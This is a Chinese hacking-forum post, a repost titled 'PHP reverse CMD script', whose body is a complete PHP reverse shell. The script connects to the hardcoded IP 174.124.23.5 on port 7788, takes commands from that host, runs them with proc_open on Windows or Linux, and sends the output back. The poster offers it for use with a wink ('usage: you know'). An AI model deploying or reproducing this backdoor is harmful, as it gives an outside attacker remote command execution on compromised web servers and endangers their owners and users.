搜索
红客联盟 - 由08安全团队运营»社区首页 技术攻防 技术文章 php反弹CMD脚本 (转)
查看: 8511|回复: 0

php反弹CMD脚本 (转)

[复制链接]
Bat
  • TA的每日心情
    慵懒
    2016-12-9 22:01

    • 签到天数: 77 天

    [LV.6]常住居民II
    发表于 2013-11-23 17:35:13 | 显示全部楼层 |阅读模式
    <?php
    error_reporting (E_ERROR);
    ignore_user_abort(true);
    ini_set(‘max_execution_time’,0);
    $os = substr(PHP_OS,0,3);
    $ipaddr = ’174.124.23.5′;
    $port = ’7788′;
    $descriptorspec = array(0 => array(“pipe”,“r”),1 => array(“pipe”,“w”),2 => array(“pipe”,“w”));
    $cwd = getcwd();
    $msg = php_uname().“\n————Code by Spider————-\n”;
    if($os == ‘WIN’) {
        $env = array(‘path’ => ‘c:\\windows\\system32′);
    } else {
        $env = array(‘path’ => ‘/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin’);
    }
    if(function_exists(‘fsockopen’)) {
        $sock = fsockopen($ipaddr,$port);
        fwrite($sock,$msg);
        while ($cmd = fread($sock,1024)) {
            if (substr($cmd,0,3) == ‘cd ’) {
                $cwd = trim(substr($cmd,3,-1));
                chdir($cwd);
                $cwd = getcwd();
            }
            if (trim(strtolower($cmd)) == ‘exit’) {
                break;
            } else {
                $process = proc_open($cmd,$descriptorspec,$pipes,$cwd,$env);
                if (is_resource($process)) {
                    fwrite($pipes[0],$cmd);
                    fclose($pipes[0]);
                    $msg = stream_get_contents($pipes[1]);
                    fwrite($sock,$msg);
                    fclose($pipes[1]);
                    $msg = stream_get_contents($pipes[2]);
                    fwrite($sock,$msg);
                    fclose($pipes[2]);
                    proc_close($process);
                }
            }
        }
        fclose($sock);
    } else {
        $sock = socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
        socket_connect($sock,$ipaddr,$port);
        socket_write($sock,$msg);
        fwrite($sock,$msg);
        while ($cmd = socket_read($sock,1024)) {
            if (substr($cmd,0,3) == ‘cd ’) {
                $cwd = trim(substr($cmd,3,-1));
                chdir($cwd);
                $cwd = getcwd();
            }
            if (trim(strtolower($cmd)) == ‘exit’) {
                break;
            } else {
                $process = proc_open($cmd,$descriptorspec,$pipes,$cwd,$env);
                if (is_resource($process)) {
                    fwrite($pipes[0],$cmd);
                    fclose($pipes[0]);
                    $msg = stream_get_contents($pipes[1]);
                    socket_write($sock,$msg,strlen($msg));
                    fclose($pipes[1]);
                    $msg = stream_get_contents($pipes[2]);
                    socket_write($sock,$msg,strlen($msg));
                    fclose($pipes[2]);
                    proc_close($process);
                }
            }
        }
        socket_close($sock);
    }
    ?>
    windows,linux,内外网均可反弹。 使用方法: 相信你懂的.
    回复

    使用道具 举报

    返回列表 发帖
    高级模式
    B Color Image Link Quote Code Smilies
    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-24 01:14 , Processed in 0.021976 second(s), 12 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部